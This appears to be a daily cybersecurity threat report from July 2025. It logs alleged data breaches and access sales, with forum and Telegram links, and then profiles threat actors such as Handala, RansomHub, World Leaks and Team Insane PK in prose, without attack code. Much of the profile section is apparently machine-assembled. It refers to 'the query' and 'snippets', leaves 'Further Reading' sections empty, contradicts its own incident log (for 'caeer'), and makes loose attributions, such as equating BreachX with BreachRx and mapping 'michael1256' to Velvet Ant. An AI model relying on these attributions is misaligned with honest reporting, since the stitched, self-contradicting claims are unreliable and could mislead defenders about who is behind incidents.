[July-08-2025] Daily Cybersecurity Threat Report

Posted on

I. Executive Summary

The past 24 hours have highlighted a dynamic and increasingly sophisticated cybersecurity landscape, characterized by a confluence of financially motivated cybercrime and state-sponsored operations. Analysis of recent incidents reveals a persistent focus on data exfiltration for extortion, the exploitation of critical infrastructure, and the innovative misuse of legitimate tools and system misconfigurations by adversaries. A significant trend emerging from these activities is the blurring of traditional distinctions between threat actor motivations and capabilities. Financially driven groups are now frequently employing advanced evasion techniques, such as abusing legitimate software and signed drivers, which were once primarily associated with nation-state actors.1 Conversely, some state-sponsored operations, while focused on espionage, also engage in activities that result in financial gain, such as cyber-facilitated cargo theft.2 This convergence means that organizations can no longer assume that advanced persistent threat (APT) capabilities are exclusive to state-backed entities. Defensive strategies must therefore be robust and comprehensive, designed to counter a wide spectrum of sophisticated threats regardless of their primary objective. This report details specific incidents, profiles the associated threat actors, and discusses the broader implications for cybersecurity posture.

II. Daily Incident Log

This section provides a summary of cybersecurity incidents reported within the last 24 hours, offering a concise overview of the affected entities, the nature of the breaches, and the identified threat actors. For each incident, direct links to published reports and supporting screenshots are provided for verification and deeper investigation.

Incident: Alleged sale of UAE Private Business Database

Incident: Alleged database sale of Skillbee

Incident: Alleged sale of Zoom Private SI Kit Loader

Incident: Alleged data breach of Helwan University

Incident: Alleged Sale of EDRs and USA Government Data

  • Category: Initial Access
  • Date: 2025-07-08T12:05:54Z
  • Threat Actor(s): caeer
  • Content: Threat actor claims to be selling EDR access and U.S. government data packages, along with regular government records from countries such as Argentina, Brazil, and Zambia. The offering also includes premium bundles featuring social media subpoenas, forged documents, and high-value subpoenas for platforms like Instagram, Facebook, Telegram, and Gmail.
  • Published URL: https://kittyforums.to/thread/575
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/106a87b9-61c5-4caf-91f2-cb0c905c40d2.png

Incident: Alleged access to Saudi Ministry of Justice

Incident: Alleged sale of UBC — Access mining infrastructure

Incident: Team insane Pakistan targets the website of Banaras Hindu University (BHU)

Incident: Alleged data breach of Albiko Furniture

Incident: Alleged data breach of Evolution Academy

Incident: Alleged data breach of Cherkasy State Business-College

Incident: Alleged data breach of Ukraine Kremenchuk Mykhailo Ostrohradskyi University

Incident: Alleged data sale of an Unidentified jewelry Shop

Incident: Alleged data breach of Rosenkranz Scherer GmbH

Incident: Alleged data leak of French Property

Incident: Alleged data leak of Trustpilot

Incident: Alleged data breach of Iran International

  • Category: Data Breach
  • Date: 2025-07-08T08:13:16Z
  • Threat Actor(s): Handala Hack
  • Victim Organization: iran international
  • Victim Country: Iran
  • Victim Industry: Broadcast Media
  • Victim Site: iranintl.com
  • Content: A group claims to have hacked Iran International, gaining access to internal systems, emails, staff details, and financial records. They mentioned that a full data release will happen soon as part of a larger operation.
  • Published URL: https://t.me/handala_hack27/107
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/3488ec60-332b-481b-9e8b-646bff20bc92.png

Incident: Alleged sale of personal data from USA

Incident: Alleged sale of mail:pass corporate data

Incident: Alleged data breach of Al Azhar Kalibanteng

Incident: Alleged data sale of Forex & Crypto Depositor databases

Incident: Alleged Sale of Unauthorized Access to Superior Audit Office of the State of Nayarit

Incident: Alleged sale of the AURA Stealer

Incident: Alleged leak of SSN data in US

Incident: Alleged data leak of Israeli systems

Incident: Alleged Sale of Unauthorized Access to Euskal Herria BilduA

III. In-Depth Threat Actor Profiles

This section provides detailed profiles of the threat actors identified in today’s incidents, offering context on their operations, motivations, and technical approaches.

Threat Actor: Phorpiex Operators

Phorpiex is not a singular threat actor but rather a well-established botnet malware, recognized as one of the leading cyber threats since at least 2021.4 The operators behind the Phorpiex botnet are primarily driven by financial gain, employing a diverse range of monetization strategies. They engage in extortion, notably through sextortion scams where infected systems send spam emails threatening to release compromising videos.4 Cryptojacking is another significant revenue stream, leveraging the computational power of compromised machines to mine cryptocurrency on the attackers’ behalf, sometimes using cryptocurrency clipper malware to redirect payments.4 Furthermore, the botnet is utilized for malware delivery, acting as a platform to distribute various malicious payloads, including ransomware, cryptomining tools, spambots, and infostealers. This allows operators to sell access to compromised systems or launch direct ransomware attacks, extorting ransoms for data restoration.4

Initial infection typically begins with the delivery of a dropper, which can be distributed through multiple vectors. These include infected USB drives, phishing via instant messaging and emails, being dropped by other malware or unwanted programs, and downloads from deceptive sites masquerading as legitimate software providers.4 The botnet also incorporates worm modules for self-spreading, enhancing its reach.4 Phorpiex has been observed to operate even without an active command-and-control (C2) server, indicating a degree of resilience in its design.5 Recent campaigns have specifically targeted entities within the finance sector across Europe and North America, utilizing shortcut files with embedded malicious macros to infect systems and download additional malware.5 The versatility of Phorpiex in delivering various malware types makes it a persistent and dangerous threat, as a single infection can open the door for multiple attackers to gain access and deploy different forms of malicious software.4

Further Reading:

Threat Actor: Pryx

Pryx is a notable threat actor who has recently escalated their activities within the cybercrime community. Operating under aliases such as “HolyPryx” and “Sp1d3r” (distinct from another actor using similar names), Pryx claims to be 17 years old and is primarily active on the XSS cybercrime forum since June 2024, with occasional presence on BreachForums.6 This actor is recognized for their involvement in malware and ransomware development, as well as identity access brokering.6

Pryx has made significant contributions, particularly through their write-ups on server-side information stealers and silent Tor servers, demonstrating a technical proficiency in developing novel malware.6 A major development in their recent history is the formation of a new ransomware group named Hellcat, which has already claimed four victims on its data leak site.6 Pryx is also connected to a network of prominent collaborators, including IntelBroker and members of the “Five Families” hacking alliance, indicating a well-established position within the cybercrime ecosystem.6 The primary motivation behind Pryx’s activities appears to be financial gain, derived from ransomware operations and the sale of access and malware.

Further Reading:

Threat Actor: Velvet Ant (Associated with “michael1256” context)

While the query might refer to “michael1256” 7, research attributes the associated activity to a sophisticated actor tracked as “Velvet Ant” by cybersecurity firm Sygnia.8 Velvet Ant is suspected to be a China-nexus cyber espionage actor, demonstrating robust capabilities to adapt and pivot their tactics rapidly in response to defensive measures.8

This group has been responsible for a prolonged attack, lasting approximately three years, against an unnamed organization located in East Asia.8 Their primary motivation is cyber espionage, focusing on the collection of sensitive information, particularly customer and financial data.8 Velvet Ant’s tactics involve establishing persistence using legacy F5 BIG-IP appliances, which they then repurpose as internal command-and-control (C&C) infrastructure for defense evasion.8 They frequently deploy PlugX (also known as Korplug), a modular remote access Trojan (RAT) widely used by Chinese espionage operators. PlugX infections often rely on DLL side-loading techniques.8 To further evade detection, Velvet Ant has been observed attempting to disable endpoint security software before installing PlugX. For lateral movement within compromised networks, they leverage open-source tools like Impacket.8 A particularly advanced tactic involves deploying two versions of PlugX: one configured with an external C&C server for exfiltrating sensitive data from internet-connected endpoints, and another without C&C configuration, deployed exclusively on legacy systems to blend malicious traffic with legitimate internal network activity.8 This dual deployment strategy underscores their sophisticated approach to maintaining covert operations over extended periods.

Further Reading:

Threat Actor: anongod

The threat actor known as “anongod” is active on deep web hacking forums like RAMP, having joined in 2023.9 This actor has a mixed reputation within these communities, suggesting a combination of legitimate and perhaps dubious offerings.9 anongod is associated with the Bl00dy Ransomware Gang, indicating potential involvement in ransomware-related activities.10

anongod’s primary motivation is financial gain, achieved through various means. In 2024, the actor advertised databases purportedly stolen from police departments in South American nations, as well as a significant 9-gigabyte data breach allegedly from the California Secretary of State.9 A notable instance of their activity occurred on January 5, 2025, when anongod advertised a zero-day vulnerability allegedly targeting the Solana Blockchain platform for USD 150,000.9 This advertisement, however, was met with skepticism by forum users due to the relatively low asking price, the omission of escrow services, and the lack of proof-of-concept, leading to questions about its legitimacy.9 This situation illustrates a common challenge in the underground economy: verifying the authenticity of claimed vulnerabilities and stolen data. The actor’s willingness to advertise such a lucrative vulnerability for sale, rather than exploit it themselves for potentially greater revenue, also raised questions about their technical expertise or risk assessment.9 anongod’s tactics primarily involve data brokerage and the sale of alleged zero-day vulnerabilities, leveraging deep web forums as their marketplace. Their targeting profile includes law enforcement and government entities for data breaches, and blockchain platforms for vulnerability sales.9

Further Reading:

Threat Actor: (Clarification for “namolesa”)

The term “namolesa” does not correspond to a specific malicious threat actor in the available research. Instead, the provided information discusses general aspects of threat actor naming conventions and the importance of focusing on technical details over nicknames.11 For instance, cybersecurity vendors use different naming methodologies for threat actors, such as CrowdStrike’s adjective-animal convention or Mandiant’s three-letter acronyms.12 This variety underscores why security teams should prioritize concrete indicators, tactics, techniques, and procedures (TTPs), and contextual information relevant to their technology stack, geography, or industry, rather than relying solely on a threat actor’s moniker.12 Effective threat intelligence workflows are enhanced by naming normalization, but the core value lies in understanding

how an adversary operates, not just what they are called.12

Further Reading:

Threat Actor: (Clarification for “caeer”)

The term “caeer” does not refer to a specific malicious threat actor in the provided research. Instead, the snippets associated with this term describe legitimate organizations focused on career development, such as “Career Hackers” and “The Job Hackers”.15 This highlights a potential misidentification in the query.

To provide relevant context, it is important to understand the broader landscape of threat actors. A threat actor is any individual or group that intentionally causes harm in the digital realm by exploiting vulnerabilities in computers, networks, or systems.17 This broad definition encompasses various types, each with distinct motivations and methods. These include financially motivated cybercriminals who seek monetary gain through data theft or ransomware; nation-state actors, often government-backed, focused on espionage, disinformation, or disrupting critical infrastructure; hacktivists driven by political or ideological agendas; insiders who exploit their legitimate access; and “script kiddies” who use pre-existing tools without deep technical skills.17 Understanding these categories is crucial for developing effective detection methods and incident response strategies, as the motivations and resources behind an attack dictate its nature and persistence.18

Further Reading:

Threat Actor: (Clarification for “eksta”)

The term “eksta” does not correspond to a specific malicious threat actor in the provided research. “Trojan:Win32/Ekstak” refers to a type of malware detected by Microsoft Defender Antivirus, capable of performing various malicious actions on a device.19 This indicates that “eksta” likely refers to malware rather than an actor.

However, the research provides valuable context on how various threat actors exploit corporate vulnerabilities. Threat actors are consistently engaged in infiltrating corporate assets, extracting valuable information, and distributing it on cybercrime forums for trade.20 Their initial access vectors are diverse, encompassing the exploitation of software vulnerabilities (such as SQL injection, API vulnerabilities, and misconfigurations), the deployment of malware, phishing attacks, and the leveraging of compromised credentials.20 Notable examples include the 2012 Yahoo breach via SQL injection, the 2023 Twitter data scrape exploiting API vulnerabilities, and the compromise of a Brazilian supermarket through a misconfigured Amazon S3 bucket.20 Supply chain attacks are also prevalent, as seen with the University of California breach facilitated by a vulnerability in a third-party provider’s software.20 The focus on stealing or obtaining login credentials for database services, often through attacks or purchases on cybercrime markets, underscores the importance of robust access controls.20

Further Reading:

Threat Actor: (Clarification for “clockwork_orange”)

The term “clockwork_orange” does not refer to a specific malicious threat actor in the provided research. The snippets associated with this term refer to fictional hacker groups (like “fsociety” from “Mr. Robot” 23), general definitions of threat actors 24, or details about unrelated groups like UNC3944 and Rey (linked to HellCat ransomware).25

However, the information provides important context on how threat actors operate and adapt. For instance, the decline in activity from UNC3944, also known as Scattered Spider, following law enforcement actions in 2024 demonstrates the effectiveness of counter-cybercrime efforts.25 This group, a financially motivated threat actor, is known for its persistent use of social engineering and targeting of organizations with large quantities of personally identifiable information (PII) and financial data.25 Despite law enforcement disruption, it is common for threat actors to temporarily pause or scale back operations to reduce scrutiny, rebuild capabilities, or adopt new tools to evade detection.25 This highlights that while law enforcement is crucial, it rarely signifies a definitive end to an actor’s activities; organizations must anticipate re-emergence or shifts in tactics.

Another relevant actor mentioned is “Rey,” who is affiliated with the HellCat ransomware group.26 Rey claimed responsibility for a cyberattack on Orange Group’s Romanian operations, where access was obtained through compromised credentials and vulnerabilities in Jira, an issue-tracking software.26 The attacker maintained access for over a month and exfiltrated approximately 380,000 unique email addresses, internal company documents, and customer information during a three-hour operation.26 An extortion attempt failed, leading to the data being leaked on a hacker forum.26 This illustrates how individual actors, even if affiliated with larger groups, can conduct independent operations, often leveraging common vulnerabilities and focusing on data exfiltration for direct financial pressure.

Further Reading:

Threat Actor: Team Insane PK

Team Insane PK is a prominent religious “hacktivist” organization, allegedly based out of Pakistan, that has gained notoriety for its cyberattacks, primarily targeting Indian government and business websites since early 2023.27 Their activities are driven by religious ideologies, aiming to promote a specific belief system or discredit others, often in retaliation for cyber warfare involving Indian, Pakistani, and Malaysian hacktivist teams.27 The group has been active since at least July 2022 (Twitter) and October 2022 (Telegram), and its reputation is rated as “Medium”.28

Their primary tactic involves Distributed Denial of Service (DDoS) attacks, where they overwhelm a network with traffic to render it inaccessible, effectively clogging bandwidth by flooding servers with data packets.27 Team Insane PK also claims responsibility for data leaks from targeted Indian businesses.27 Their attacks frequently feature religiously motivated messages.27 To provide proof of their successful DDoS attacks, the group shares evidence via Telegram posts, often including links to

check-host.net, a web utility that provides real-time information on domain availability and responsiveness.28 This practice of public validation highlights the importance of reputation building within hacktivist communities, even if the operational impact is temporary.

Notable campaigns include the “#OpIndia Campaign” on the eve of the 2023 G20 Summit in India, during which they launched approximately 2,450 targeted cyberattacks, with over 50% being DDoS attacks. These operations targeted diverse sectors, including government digital infrastructure, non-profit organizations, the finance and banking sector, and the energy and oil industry.27 As part of these operations, they temporarily disrupted the Delhi and Mumbai Police websites, causing significant disruption to crucial government infrastructure.27 Team Insane PK has also targeted various Indian businesses, including educational institutes, telecommunications companies, manufacturing firms, and national archives, claiming to have leaked sensitive data during these incidents.27 The group’s continued targeting of Indian and Iranian entities under hashtags like #OpIran and #OpIndia underscores a persistent, ideologically driven engagement in cyber warfare.28

Further Reading:

Threat Actor: (Clarification for “wh6ami”)

The term “wh6ami” does not refer to a specific malicious threat actor in the provided research. One snippet is a general video about threat actors and Google Threat Intelligence.29 Other snippets list various well-known hacker groups, offering a broader perspective on the diverse landscape of cyber adversaries.30

The cyber threat landscape is populated by a wide array of groups, each with distinct motivations and capabilities. These include:

  • Hacktivists: Groups like Anonymous, a decentralized collective known for anti-censorship and anti-surveillance activism, often operating for political reasons or “for the lulz”.30 The Chaos Computer Club (CCC) is another example, focusing on ethical hacking, exposing vulnerabilities, and advocating for digital rights.31
  • Nation-State Actors: These are often government-backed, highly sophisticated groups like the Lazarus Group (North Korea), known for financial theft and espionage, or Fancy Bear (Russia), focused on cyberespionage.30 The Equation Group, suspected to be tied to the US NSA, is considered one of the most advanced persistent threats, utilizing zero-day exploits.30 The NSA’s own elite team, Tailored Access Operations (TAO), also falls into this category.31
  • Financially Motivated Actors: This category includes Ransomware-as-a-Service (RaaS) groups like DarkSide and REvil, which engage in ransomware operations.30 Lapsus$ is known for extortion and data dumping, while ShinyHunters specializes in selling stolen data on dark web marketplaces.30 The Dark Overlord focuses on data breaches and financial extortion, often releasing stolen information when demands are not met.30 Evil Corp is another financially driven group involved in theft and fraud.30
  • Thrill-Seekers/Disruptive Groups: LulzSec, for instance, was known for chaotic hacking sprees and DDoS attacks, often for “lulz”.30 Lizard Squad gained notoriety for DDoS attacks on gaming networks.31

This diversity underscores the complex and multifaceted nature of the global cyber threat landscape, where motivations can range from political ideology and national interests to pure financial gain or even simple amusement.

Further Reading:

Threat Actor: World Leaks

World Leaks is a new extortion platform that emerged in early 2025, specifically on January 1, 2025.32 It was launched by the operators of the Hunters International ransomware group, and the two platforms share numerous similarities in design, layout, and functionality, suggesting World Leaks is either a side project or a backup plan.32 This development represents a strategic shift from traditional double extortion (which involves both data encryption and exfiltration) to an extortion-only model. This change was reportedly driven by increased risks and reduced profitability within the ransomware ecosystem, potentially due to enhanced law enforcement efforts and improved organizational defenses.32 However, despite claiming to be “extortion-only,” some victims have still experienced ransomware deployment on their systems, indicating that the group may not strictly adhere to its stated operational model.32

World Leaks operates as an Extortion-as-a-Service (EaaS) platform, providing affiliates with a self-developed exfiltration tool, which they claim is “100% fully undetectable”.32 The platform is structured across four distinct components:

  1. Main Data Leak Site (DLS): This acts as a “trophy wall,” showcasing victims’ data that has been published or is scheduled for publication. It lists claimed victims with a countdown timer indicating the deadline before data release.32
  2. Negotiation Site: A dedicated portal for victims to communicate with the attackers and facilitate ransom payments.32
  3. Insider Platform: A restricted area for journalists, offering 24-hour advance access to information about compromised victims, designed to amplify pressure on victims.32
  4. Affiliate Panel: A backend for the group’s affiliates.32

World Leaks employs a range of psychological pressure tactics to coerce victims into paying. The victim panel features a prominent countdown timer, a direct chat for communication with threat actors (who often initiate conversations to increase pressure), and a “Storage” tab displaying exfiltrated data for victims to validate the breach.32 Payments are demanded in Bitcoin to freshly generated addresses.32 Despite a stated “No Negotiation” policy on the payment tab, communication via the support chat is possible.32

The group has faced operational challenges, including initial bugs, downtime, and fluctuations in claimed data leak sizes, raising questions about data accuracy and the group’s professionalism.32 World Leaks has also been confirmed to be collaborating with the Secp0 ransomware group, highlighting the growing specialization and interconnectedness within the cybercrime ecosystem, where different groups provide services to each other.32 A notable victim is Kentfield Hospital in California, from which World Leaks claimed to have exfiltrated 146.4 GB of data, including protected health information (PHI) and medical images.33

Further Reading:

Threat Actor: (Clarification for “DigitalGhost”)

The term “DigitalGhost” in the query primarily refers to a profile on HackerOne, a bug bounty platform for security researchers, indicating a non-malicious entity.34 However, the context often conflates it with “Ghost Squad Hackers” (GSH), a distinct and malicious hacktivist group. If the query intends to refer to a malicious actor, it is likely Ghost Squad Hackers.

Threat Actor: Ghost Squad Hackers (GSH)

Ghost Squad Hackers (GSH) is a hacktivist group with origins in the Anonymous movement, led by a de facto leader known as ‘s1ege’.22 Their operations are primarily driven by political and ideological motivations, rather than financial gain.22

GSH has been active since at least 2016 and has engaged in numerous cyberattacks targeting governments, military entities, financial institutions, and media outlets. Their TTPs include Distributed Denial of Service (DDoS) attacks to disrupt services, website defacements, and data leaks.22 Notable campaigns include:

  • Defacements: In January 2016, GSH defaced Ethiopian government websites in response to violence against students and activists.22
  • DDoS Attacks: They targeted Donald Trump’s official website and hotel collection in May 2016 due to perceived racist comments.22
  • Data Leaks: GSH gained notoriety for leaking data from the Israeli Defense Force in April 2016, including information on thousands of IDF soldiers and personnel.22 They also leaked U.S. Military personnel files, containing personal information and credit card numbers for nearly 2,437 army personnel.22
  • Ideological Targets: The group has targeted organizations based on ideological opposition, taking down Ku Klux Klan websites in protest of racism and the Black Lives Matter website, claiming it fueled racism.22
  • “Operation Icarus” (2016): In collaboration with Anonymous, GSH attacked central banking systems globally, including the Bank of England, New York Stock Exchange, and Bank of France. This operation aimed to protest corruption and “start an online revolution” against “elite banking cartels”.22
  • “OpSilence” (2016): They targeted mainstream media outlets like CNN and Fox News for censoring coverage related to “OpIsrael”.22

GSH’s consistent focus on political and social issues, combined with their use of disruptive tactics and public data exposure, firmly places them within the hacktivist category.

Further Reading:

Threat Actor: Handala Hack

Handala is an Iranian cyber group with direct links to Iran’s Ministry of Intelligence (MOIS).36 This group, along with Karma Below and Homeland Justice, is believed to be operated by a cyber unit within the MOIS’s counter-cyber threat division, primarily for advertising and influence purposes.36 Handala brands itself as pro-Palestinian and primarily conducts cyber operations and psychological warfare against Israel.37

The group has been active since at least April 2024, having launched 50 operations against Israeli and international targets in the past 10 months.37 A key characteristic of Handala’s operations is the frequent exaggeration or fictionalization of their hacks, a tactic common in Iranian cyber operations.37 This “perception hacking” aims to incite terror and panic, where the

narrative of a successful attack can be as impactful as a technical breach.37 They may also republish publicly available data and present it as sensitive leaks.37

Their tactics, techniques, and procedures (TTPs) include:

  • Exploiting Vulnerabilities: They leverage vulnerabilities in private company infrastructure, as seen in a January 2025 attack on Israeli kindergartens.36
  • Mass Communication Abuse: Handala extensively uses systems to send mass threatening text messages to Israeli citizens. For example, in April 2024, after falsely claiming to breach Israel’s Iron Dome radar system, they sent hundreds of thousands of threatening messages.36
  • Disruption of Public Systems: In the kindergarten attack, they disrupted public address (PA) systems and infiltrated emergency systems in at least 20 locations, causing red alert sirens to trigger, which are typically used for rocket warnings.36
  • Alleged Data Exfiltration and Publication: In September 2024, they claimed to breach the Soreq Nuclear Research Center, alleging the theft of 197 gigabytes of data and publishing photos and screenshots, though Israeli authorities denied the authenticity of these claims.36 They also claimed to pilfer personal information from police officers and firefighters and breach Ministry of National Security systems, claims that were unsubstantiated by Israeli authorities.37

Handala’s close ties to Iranian intelligence and its focus on psychological warfare and terrorizing civilians reveal a state-sponsored agenda that extends beyond traditional espionage or financial gain. Their willingness to target critical civilian infrastructure and exploit public fear demonstrates a low ethical threshold in achieving their political objectives.

Further Reading:

Threat Actor: (Clarification for “G_mic”)

The term “G_mic” does not refer to a specific named threat actor in the provided research. Instead, the snippets discuss how government-backed threat actors generally operate and their evolving use of generative AI 38, or refer to unnamed Russian groups 39 and the LummaC2 malware.40 If “G_mic” appears in the query, it likely serves as a generic descriptor for a sophisticated, potentially state-sponsored, threat.

Government-backed threat actors are highly sophisticated adversaries, often supported and protected by their respective nations.17 Their primary motivations are typically political or nationalistic, focusing on espionage, intelligence gathering, spreading disinformation, or disrupting critical infrastructure.17 These groups are characterized by their advanced capabilities, stealth, and persistence, making their activities particularly challenging to detect.17

Recent observations indicate that government-backed threat actors are experimenting with generative AI models, such as Gemini, to enhance their operations.38 However, current analysis suggests that AI is primarily used for productivity gains rather than for developing novel or unique attack techniques.38 Common AI use cases include troubleshooting code, conducting research (e.g., on potential infrastructure, free hosting providers, target organizations, and vulnerabilities), generating and localizing content, developing payloads, and assisting with malicious scripting and evasion techniques.38 While AI allows these actors to operate faster and at higher volume, it is currently an accelerant for existing TTPs rather than a revolutionary tool for new attack vectors. Attempts to abuse AI models for direct product exploitation or to elicit internal system information have largely been unsuccessful.38

An example of such a sophisticated, potentially government-backed actor is an unnamed Russian group believed to operate under the Foreign Intelligence Service (FSI).39 This group has been observed using new malware, “Wineloader,” in attacks against Western authorities, including breaching the email accounts of top Microsoft employees.39 Separately, the LummaC2 malware has been observed targeting U.S. critical infrastructure sectors, capable of infiltrating networks and exfiltrating sensitive information.40 The persistent targeting of high-impact sectors, whether for espionage, disruption, or pre-positioning, remains a key focus for these sophisticated adversaries.

Further Reading:

Threat Actor: (Clarification for “driver001”)

The term “driver001” does not refer to a specific threat actor in the provided research. Instead, the snippets identify two distinct, yet related, sophisticated actors: “EncryptHub” (also known as Water Gamayun or Larva-208) and “UNC3944.”

Threat Actor: EncryptHub (Water Gamayun, Larva-208)

EncryptHub is a prolific Russian threat actor, believed to be the work of a single individual, who became active in late June 2024.42 This actor has engaged in a “ransomware rampage,” infecting over 600 organizations.42 Their primary motivation is financial gain through ransomware operations.

EncryptHub’s tactics are characterized by high sophistication. They employ highly personalized spear-phishing as an initial access vector.42 A key aspect of their operations involves exploiting zero-day flaws, such as the Microsoft Management Console (MMC) framework vulnerability CVE-2025-26633 (also known as MSC Evil Twin).42 By manipulating

.msc files and the MCC console’s Multilingual User Interface Path (MUIPath), EncryptHub is able to execute malicious code, establish persistence, and exfiltrate sensitive data from infected systems.42 This exploitation of a zero-day in a widely used Microsoft component underscores a significant capability in vulnerability research and exploitation.

Threat Actor: UNC3944

UNC3944 is a financially motivated threat actor that has been active since at least May of the current year.1 This group has been observed deploying Hive ransomware against targets in the medical industry 1 and is also linked to DragonForce ransomware, which later claimed control of RansomHub.25

UNC3944’s initial access often relies on credentials stolen from SMS phishing operations.1 A particularly concerning aspect of their TTPs is the abuse of legitimate Microsoft-signed drivers, such as Poortry and Stonestop malware, to bypass endpoint security products like antivirus and Endpoint Detection and Response (EDR).1 By using “attestation signing,” they make their malicious components appear trusted by Microsoft, significantly hindering detection.1 These drivers are then used to control, pause, or terminate various processes on targeted endpoints.1 Beyond ransomware, UNC3944 has also attempted to offer SIM swapping services.1 Their targeting profile is broad, including telecommunications, business process outsourcing (BPO) companies, managed security service providers (MSSPs), financial services, entertainment, and medical industries.1 The adoption of advanced evasion techniques, such as abusing legitimate, signed drivers, by a financially motivated group like UNC3944 demonstrates a critical shift in the cybercrime landscape, where sophisticated capabilities are no longer exclusive to state-sponsored actors. This means that even financially driven groups are capable of highly evasive and impactful attacks.

Further Reading:

Threat Actor: (Clarification for “gesss”)

The term “gesss” does not refer to a specific threat actor in the provided research. The snippets associated with this term provide general definitions of threat actors 41, mention a different actor named “Packrat” 43, discuss the historical hacker Markus Hess 44, and detail the DarkSide ransomware group.45 If “gesss” appears in the query, it is likely a misidentification or a generic placeholder.

However, the information provides valuable context on the motivations and targets of various threat actors. Threat actors are individuals or groups that conduct cyberattacks, and they are typically categorized by their motive, the type of attack they employ, and their targeted sector.41 Their primary objectives often include monetary gain, data acquisition, intelligence gathering, or causing service disruption and reputational damage to large organizations.41 Cybercriminals, for instance, are financially motivated and frequently use tactics like phishing.41 Nation-state actors, often well-resourced, engage in espionage or cyberwarfare, seeking to exfiltrate or corrupt sensitive data and disrupt critical infrastructure.41 Terrorist groups aim to cause harm and destruction to advance their cause, targeting critical services.41 Thrill-seekers attack for personal enjoyment, while insider threats, who have legitimate access, can be particularly damaging and difficult to detect.41

An example of a financially motivated group is the DarkSide ransomware group, which operated as a Ransomware-as-a-Service (RaaS).45 DarkSide claimed responsibility for a ransomware attack and data breach against clothing retailer Guess in early 2021, exfiltrating over 200GB of data.45 This group’s operations highlight the volatile nature of RaaS groups and the potential for affiliates to shift to new platforms or for groups to cease operations and potentially rebrand, making continuous monitoring essential.

Further Reading:

Threat Actor: (Clarification for “BreachX”)

The term “BreachX” (or “BreachRx”) does not refer to a threat actor but rather to a legitimate cybersecurity incident response management (CIRM) platform.46 This platform is designed to help organizations respond to incidents with confidence, clarity, and speed, by automating and streamlining incident response processes across various business teams.46 This is a crucial distinction, as it represents a solution provider rather than a malicious entity.

The context provided highlights a significant shift in cybersecurity strategy: the move from reactive defense to proactive threat intelligence. Reactive cybersecurity, which primarily responds to alarms after a breach has occurred, is increasingly insufficient against sophisticated attackers.47 Instead, the focus is shifting towards detecting, analyzing, and validating unknown vulnerabilities

before they become public, weaponized, or exploited.47 This proactive approach involves several key components:

  • Dark Web Monitoring and Analysis: Continuously monitoring underground forums where sophisticated threat actors communicate, trade information, and discuss vulnerabilities and attack vectors.47
  • Threat Actor Profiling and Attribution: Understanding who is targeting a specific industry and how they operate provides crucial context for developing effective defense strategies.47
  • Vulnerability Discovery and Validation: Actively discovering vulnerabilities through automated analysis and security research, and validating which vulnerabilities pose genuine threats.47
  • “Golden Window” Intelligence: Identifying the critical period between when a vulnerability exists and when it becomes publicly known or patched. Organizations with advanced intelligence can implement protective measures during this window, gaining a significant advantage.47

Artificial intelligence and machine learning play a vital role in this proactive shift, as advanced AI systems can analyze vast quantities of data from diverse sources—network traffic, dark web communications, vulnerability research, and threat actor behaviors—to identify patterns that human analysts might miss.47 Companies like BreachRx are pioneering this approach by combining real-time vulnerability discovery, dark web monitoring, and threat actor profiling to provide this crucial “Golden Window Intelligence”.47 This strategic shift is essential for enterprises to stay ahead of sophisticated attackers in a constantly evolving threat landscape.

Further Reading:

Threat Actor: RansomHub (Associated with “Ranssi” context)

The term “Ranssi” does not refer to a specific threat actor in the provided research. The extensive details are provided for the “RansomHub” ransomware group.

Threat Actor: RansomHub Ransomware Group

RansomHub is a prominent and technically advanced Ransomware-as-a-Service (RaaS) collective, first identified in February 2024.48 It is believed to be a successor or evolution of the Knight ransomware group, with apparent ties to former affiliates of the ALPHV ransomware group.48 RansomHub’s rapid growth is largely attributed to its innovative affiliate prepayment system. Unlike many other RaaS groups that operate on a revenue-sharing model, RansomHub requires affiliates to pay upfront to join the operation. This model ensures the group’s financial security while incentivizing affiliates to conduct attacks using RansomHub’s tools and infrastructure.48 The group’s primary motivation is financial gain through data encryption and exfiltration.48

RansomHub’s operations are methodical and employ a wide range of tactics, techniques, and procedures (TTPs) to maximize impact and minimize detection:

  • Initial Access: They primarily exploit well-known vulnerabilities in public-facing applications, such as the Zerologon vulnerability (CVE-2020-1472) in Windows Servers, which allows them to bypass security measures and gain full control of domain controllers.48 Phishing, including personalized spear-phishing, is also used to gain initial access.48
  • Execution & Lateral Movement: Once inside a network, RansomHub leverages Windows Management Instrumentation (WMI) to remotely execute commands and PowerShell for malicious scripts and disabling security measures.48 They frequently use legitimate tools like PsExec, Windows Remote Desktop Protocol (RDP), and Server Message Block (SMB) protocols for lateral movement, often with valid or compromised credentials.48 SSH, sometimes with utilities like PuTTY, Bitvise, or MobaXterm, is used for lateral movement, particularly to ESXi servers.49 They also employ Impacket’s smbexec utility 49, remote management software (e.g., Splashtop, Screenconnect), and tunneling tools (e.g., NGROK, RSOCX).49 Proxy malware like SYSTEMBC may also be used for lateral movement.49
  • Persistence & Privilege Escalation: RansomHub maintains access by modifying or creating new user accounts (Account Manipulation, T1098) and exploits vulnerabilities in operating systems or applications to gain administrative-level access (Exploitation for Privilege Escalation, T1068).48
  • Defense Evasion: They attempt to hide their presence by masquerading malicious files to appear legitimate (T1036), deleting or modifying logs and traces (T1070), and disabling security tools like antivirus software (T1562.001).48
  • Credential Access & Impact: They extract sensitive credentials (e.g., password hashes, clear-text passwords) from compromised systems (OS Credential Dumping, T1003).48 In addition to encrypting data, RansomHub steals sensitive information (e.g., financial documents, client data, intellectual property). This data exfiltration is used to pressure organizations into paying a ransom to prevent public release, amplifying the urgency of their demands.48

RansomHub targets high-value organizations across various sectors globally, including aerospace and defense, energy, healthcare, government agencies, law enforcement, telecommunications, pharmaceuticals, and manufacturing.48 Their flexibility in targeting both small enterprises and multinational corporations helps maximize ransom payouts.48 The heavy reliance of ransomware groups, including RansomHub, on

known vulnerabilities and legitimate tools for lateral movement and execution highlights that fundamental cyber hygiene practices—such as timely patching, implementing multi-factor authentication, enforcing strong access controls, and monitoring for the misuse of legitimate tools—remain critical defenses, even against sophisticated adversaries. The fact that zero-day exploitation for initial access is not commonly observed in these incidents further emphasizes the importance of addressing known security weaknesses.49

Further Reading:

Threat Actor: (Clarification for “AuraCorp malware developer”)

The term “AuraCorp malware developer” is a misidentification. “Aura” is a legitimate technology company that provides digital security solutions, including antivirus and anti-malware software, and is not a malware developer or a threat actor.50

